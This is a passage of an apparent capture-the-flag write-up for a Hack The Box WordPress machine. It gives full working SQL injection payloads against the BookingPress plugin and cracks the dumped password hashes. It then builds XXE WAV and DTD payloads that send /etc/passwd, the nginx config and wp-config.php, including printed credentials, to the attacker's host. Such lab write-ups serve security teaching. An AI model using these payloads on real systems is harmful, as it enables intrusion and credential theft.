    HTTP/1.1 200 OK\nServer: nginx/1.18.0\nDate: Mon, 14 Nov 2022 08:20:06 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nX-Powered-By: PHP/8.0.24\nAccess-Control-Allow-Origin: http://metapress.htb\nAccess-Control-Allow-Credentials: true\nX-Robots-Tag: noindex\nX-Content-Type-Options: nosniff\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\nCache-Control: no-cache, must-revalidate, max-age=0\nX-Frame-Options: SAMEORIGIN\nReferrer-Policy: strict-origin-when-cross-origin\nContent-Length: 553\n\n[{\"bookingpress_service_id\":\"1\",\"bookingpress_category_id\":\"1\",\"bookingpress_service_name\":\"Startup meeting\",\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":\"30\",\"bookingpress_service_duration_unit\":\"m\",\"bookingpress_service_description\":\"Join us, we will celebrate our startup!\",\"bookingpress_service_position\":\"0\",\"bookingpress_servicedate_created\":\"2022-06-23 18:02:38\",\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

    Cool. Let's now check what happens when you use this payload:

    HTTP/1.1 200 OK\nServer: nginx/1.18.0\nDate: Mon, 14 Nov 2022 08:22:46 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nX-Powered-By: PHP/8.0.24\nAccess-Control-Allow-Origin: http://metapress.htb\nAccess-Control-Allow-Credentials: true\nX-Robots-Tag: noindex\nX-Content-Type-Options: nosniff\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\nCache-Control: no-cache, must-revalidate, max-age=0\nX-Frame-Options: SAMEORIGIN\nReferrer-Policy: strict-origin-when-cross-origin\nContent-Length: 2\n\n[]\n

    So, when the condition is false (1=2), we are having a different response from the server. This proves that we are facing a SQL Injection vulnerability.

    Also, we could run a scanner with the tool sqlmap to see if this request is vulnerable. Save this request in a file (in my case I will call it bookrequest:

    POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 112\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9\n

    Now run sqlmap:

    sqlmap -r bookrequest\n

    Extract from the results:

    [03:30:05] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable\nPOST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] \nsqlmap identified the following injection point(s) with a total of 436 HTTP(s) requests:\n---\nParameter: total_service (POST)\n    Type: time-based blind\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) AND (SELECT 2533 FROM (SELECT(SLEEP(5)))kDHj) AND (2027=2027\n\n    Type: UNION query\n    Title: Generic UNION query (NULL) - 9 columns\n    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a717071,0x467874624e5a4862654847417a50625064757853724c584c57504443685668756446725643566d56,0x7171627a71),NULL,NULL-- -\n---\n[03:30:17] [INFO] the back-end DBMS is MySQL\nweb application technology: Nginx 1.18.0, PHP 8.0.24\nback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)\n[03:30:17] [WARNING] HTTP error codes detected during run:\n400 (Bad Request) - 123 times\n[03:30:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/metapress.htb'\n

    This saves us some time. Now we know there are two SQLi vulnerabilities. The first is a time-based blind one. And the second one is a SQL injection based on a UNION QUERY. Also, we know the query is on a table with 9 columns, being the seventh one the injectable.

    We could have also used the Repeater module in Burp Suite and sent a request for 9 columns and for 10 columns (I will only paste the payload):

    # payload of 9 columns. In case of an empty response, the table would have 8 columns.\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+9;--+-\n\n# payload of 10 columns. In case of an empty response, the table would have 9 columns.\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+10;--+-\n

    Since we have an empty response with 10 columns we can conclude that the table has 9 columns.

    To get which columns are being displayed, use this payload:

    action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+all+1,2,3,4,5,6,7,8,9;--+-\n

    In the body of the response, we obtain:

    [{\"bookingpress_service_id\":\"1\",\"bookingpress_category_id\":\"2\",\"bookingpress_service_name\":\"3\",\"bookingpress_service_price\":\"$4.00\",\"bookingpress_service_duration_val\":\"5\",\"bookingpress_service_duration_unit\":\"6\",\"bookingpress_service_description\":\"7\",\"bookingpress_service_position\":\"8\",\"bookingpress_servicedate_created\":\"9\",\"service_price_without_currency\":4,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

    All of the columns are being displayed, and this makes sense since it is a UNION query.

    Now we are ready to perfom our attack using Burpsuite. These would be the succesive payloads:

    # 1. Get the names of the databases:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_schema,null,null,null,null,null,null,null,null+FROM+information_schema.tables;--+-\n\n# Body of the response:\n\n[{\"bookingpress_service_id\":\"information_schema\",\"bookingpress_category_id\":null,\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"},{\"bookingpress_service_id\":\"blog\",\"bookingpress_category_id\":null,\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n\n# 2. Get the names of all tables from the selected database:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_name,null,null,null,null,null,null,null,null+FROM+information_schema.tables+WHERE+table_schema=blog;--+-\n\n# But since we are having some issues when using \"WHERE\" we will dump the database. \n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+null,null,null,null,null,null,null,null,table_name+FROM+information_Schema.tables;--+-\n\n# This will give us an extended response from where we need to read and select the interesting table. We will use filters in BurpSuite to locate all results related to USERS. And, as matter of fact we can locate a specific table (the common one in WordPress, by the way): wp_users. We will use this later.\n\n# 3. Get the name of all columns of a selected table from a selected database. But since we are having problems using WHERE, we will dump all columns names:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+column_name,null,null,null,null,null,null,null,null+FROM+information_schema.columns;--+-\n\n# Again, the response is vast. We can use Burpsuite filter to find these two colums: user_pass and user_login\n\n# 4. Now we can query the two columns we want (user_login and user_pass) from the table wp_users:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+user_login,user_pass,null,null,null,null,null,null,null+FROM+wp_users;--+-\n\n# And the body response:\n\n[{\"bookingpress_service_id\":\"admin\",\"bookingpress_category_id\":\"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.\",\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"},{\"bookingpress_service_id\":\"manager\",\"bookingpress_category_id\":\"$P$B4aNM28N0E.tMy\\/JIcnVMZbGcU16Q70\",\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

    Same results:

    user_login user_pass admin $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. manager $P$B4aNM28N0E.tMy\\/JIcnVMZbGcU16Q70

    We are going to use the tool JohnTheRipper and the dictionary rockyou.txt to crack the hash.

    Let's first create the file book.hash with the hashes we just found.

    nano book.hash\n

    We copy paste the hashes in different lines:

    ``` $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. $P$B4aNM28N0E.tMy\\/JIcnVMZbGcU16Q70

    Press CTRL-X and enter Yes.\n\nNow run johntheripper:\n\n\n```bash\njohn -w=/usr/share/wordlists/rockyou.txt book.hash \n

    Results:

    \n

    Log in into http://metapress.htb/wp-admin with the credentials of manager. After doing so, we realize that manager is a limited user. It does not have admin rights, ok, but the user manager can upload media.

    After a little bit of research (reading documentation from wpscan.com we can see that it exists a specific vulnerability for:

    • a logged user who has enabled media uploading.
    • wordpress version 5.6.2
    • PHP version 8

    Since, our user falls into those parameters let's going to read a little bit more about that vulnerability. Read here. Quoting:

    Description: A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above. This particular vulnerability could be triggered when parsing WAVE audio files. Researchers at security firm SonarSource discovered this XML external entity injection (XXE) security flaw in the WordPress Media Library.

    Impact:

    • Arbitrary File Disclosure: The contents of any file on the host\u2019s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
    • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

    This is my first XXE attack! And it's also a pending subject for me because I was asked about it in a job interview for a pentester position and I didn't know how to answer. Great! No pain. Let's get our hands dirty =)

    Wpscan provides us with a Proof Of Concept (POC):

    1. Create payload.wav:
    RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [\n\n<!ELEMENT r ANY >\n\n<!ENTITY % sp SYSTEM \"http://attacker-url.domain/xxe.dtd\">\n\n%sp;\n\n%param1;\n\n]>\n\n<r>&exfil;</r>>\n
    1. Create xxe.dtd, the file we're going to serve:
    <!ENTITY % data SYSTEM \"php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php\">\n\n<!ENTITY % param1 \"<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>\">\n

    My IP is 10.10.14.33 and I will be using port 1234 and \"xxe.dtd\" as the name of the file in my server, so payload.wav would be (using flag -en to encode characters):

    echo -en 'RIFF\\xb8\\x00\\x00\\x00WAVEiXML\\x7b\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http://10.10.14.33:1234/xxe.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > payload.wav\n

    And my xxe.dtd file if I want to get the /etc/password file:

    <<!ENTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd\">\n<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>\" >\n

    Now, in the same folder where we have saved xxe.dtd, run a php server. In my case:

    php -S 10.10.14.33:1234\n

    Now we are ready to upload payload.wav in http://metapress.htb/wp-admin/upload.php. After we do, in the command line from we were serving our xxe.dtd file, we can read:

    10.10.11.186:39962 [404]: GET /?p=jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw== - No such file or directory   \n

    We will use PHP to decode this. Create a .php with the following code, just be sure to copy and paste the base64 returned from the WordPress server where we have 'base64here' in the example code:

    <?php echo zlib_decode(base64_decode('base64here')); ?>\n

    In my case, I will call the file code.php, and it will have the following php content:

    <?php echo zlib_decode(base64_decode('jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw=='); ?>\n

    Give executable permission to th file code.php and execute it:

    chmod +x code.php\nphp code.php\n

    Results:

    root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:109::/nonexistent:/usr/sbin/nologin\nsshd:x:104:65534::/run/sshd:/usr/sbin/nologin\njnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash\nsystemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false\nproftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin\nftp:x:107:65534::/srv/ftp:/usr/sbin/nologin\n

    Users with access to the bash terminal would be: root and jnelson. Noted!

    To request different content to the WordPress server, we only need to modify our xxe.dtd file and instead of \"/etc/passwd\", use a different path. Common files to check out are:

    • username/.ssh/id_rsa.pub: with this, we could try to login into the ssh server.
    • /etc/shadow: to extract hashes.
    • In a WordPress server: wp-config.php: inhere you could find some credentials.
    • Logs and more...

    Let's start with wp-config.php. We know from previous scans that the WordPress installation is running on a nginx server. Also, we know that wp-cofig.php file is always located at the root of the WordPress installation. Reading at the documentation, we can see that nginx server has a file that displays the enabled sites and provides an absolute path to them. That file is \"/etc/nginx/sites-enabled/default\". So, with that in mind, we can craft our xxe-nginx.dtd file with this content:

    <!ENTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/nginx/sites-enabled/default\">\n<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>\" >\n

    And for our payload-nginx.wav, we run:

    echo -en 'RIFF\\xb8\\x00\\x00\\x00WAVEiXML\\x7b\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http://10.10.14.33:1234/xxe-nginx.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > payload.wav\n

    Now, we start our php server:

    php -S 10.10.14.33:1234\n

    After uploading payload-nginx-wav from http://metapress.htb/wp-admin/upload.php, our php server will display:

    10.10.11.186:45010 [404]: GET /?p=XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0J4Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/ - or directory\n

    With this code, we craft the file code-nginx.php and give it execution permissions:

    nano code-nginx.php\n

    The content of the file will be:

    <?php echo zlib_decode(base64_decode('XVHbbsMgDH1OvsKr8tBOauhjlWrah+wSUQrEXQIIkybT0n37IK2qrpaMLHN8zjGQ9Cfp4SfPsxYpSAPbze5Wv1XVR5UaeeatDcBO3LNhGFgnA3deEpVN2LN9a3XCoDnIEeazdI27Vk3o2ngL10AFy6IJwdWNpQBPL7D4x7ZYRTfwEF4OHoOET0iTFXswsLsNnNMiVvCA1gCLTFkW/HetsJUERe9xPhiwm8vXgntNcefzTHI3/gvvCVDMLGhE2x8kkEHnZCCmOAWhcR0RpbBGRYbs2qsdJ4Le4FjNL+Z7wyIs5bbcrJXrSrLia9a813uOgssjTYJockZPR5dS6kmjmlDYiU56dbEjR4dxfej4mITjB9TGhlrZ3hzAKnXhPud/')); ?>\n

    Then we run:

    php code-nginx.php\n

    Results:

    server {\n\n        listen 80;\n        listen [::]:80;\n\n        root /var/www/metapress.htb/blog;\n\n        index index.php index.html;\n\n        if ($http_host != \"metapress.htb\") {\n                rewrite ^ http://metapress.htb/;\n        }\n\n        location / {\n                try_files $uri $uri/ /index.php?$args;\n        }\n\n        location ~ \\.php$ {\n                include snippets/fastcgi-php.conf;\n                fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;\n        }\n\n        location ~* \\.(js|css|png|jpg|jpeg|gif|ico|svg)$ {\n                expires max;\n                log_not_found off;\n        }\n\n}\n

    Nice, now we know that root is set to \"/var/www/metapress.htb/blog\" (line 6 of the code). With this, we also know wp-config.php file's location (/var/www/metapress.htb/blog/wp-config.php.

    Following previous steps, now we need to craft:

    • payload-wpconfig.wav file: to upload it to http://metapress.htb/wp-admin/upload.php.
    • xxe-wpconfig.dtd file: that we will serve with a php server.

    Let's craft xxe-wpconfig.dtd:

    NTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php\">\n<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.33:1234/?p=%file;'>\" >\n

    Now, craft the payload-wpconfig.wav file:

    echo -en 'RIFF\\xb8\\x00\\x00\\x00WAVEiXML\\x7b\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http://10.10.14.33:1234/xxe-wpconfig.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > payload-wpconfig.wav\n

    Launch the php server from the folder where we want to share the file xxe-wpconfig.dtd:

    php -S 10.10.14.33:1234\n

    After uploading our payload-wpconfig.wav file from http://metapress.htb/wp-admin/upload.php, we can read from the command line from where we launched the php server:

    10.10.11.186:57388 [404]: GET /?p=jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw== - No such file or directory\n

    With this, prepare the php file code-wpconfig.php to execute and extract the content. The content of the code-wpconfig.php file would be:

    <?php echo zlib_decode(base64_decode('jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw==')); ?>\n

    Run:

    php code-wpconfig.php\n

    Results are the content of the wp-config.php file of the wordpress installation:

    <?php\n/** The name of the database for WordPress */\ndefine( 'DB_NAME', 'blog' );\n\n/** MySQL database username */\ndefine( 'DB_USER', 'blog' );\n\n/** MySQL database password */\ndefine( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );\n\n/** MySQL hostname */\ndefine( 'DB_HOST', 'localhost' );\n\n/** Database Charset to use in creating database tables. */\ndefine( 'DB_CHARSET', 'utf8mb4' );\n\n/** The Database Collate type. Don't change this if in doubt. */\ndefine( 'DB_COLLATE', '' );\n\ndefine( 'FS_METHOD', 'ftpext' );\ndefine( 'FTP_USER', 'metapress.htb' );\ndefine( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );\ndefine( 'FTP_HOST', 'ftp.metapress.htb' );\ndefine( 'FTP_BASE', 'blog/' );\ndefine( 'FTP_SSL', false );\n\n/**#@+\n * Authentication Unique Keys and Salts.\n * @since 2.6.0\n */\ndefine( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );\ndefine( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );\ndefine( 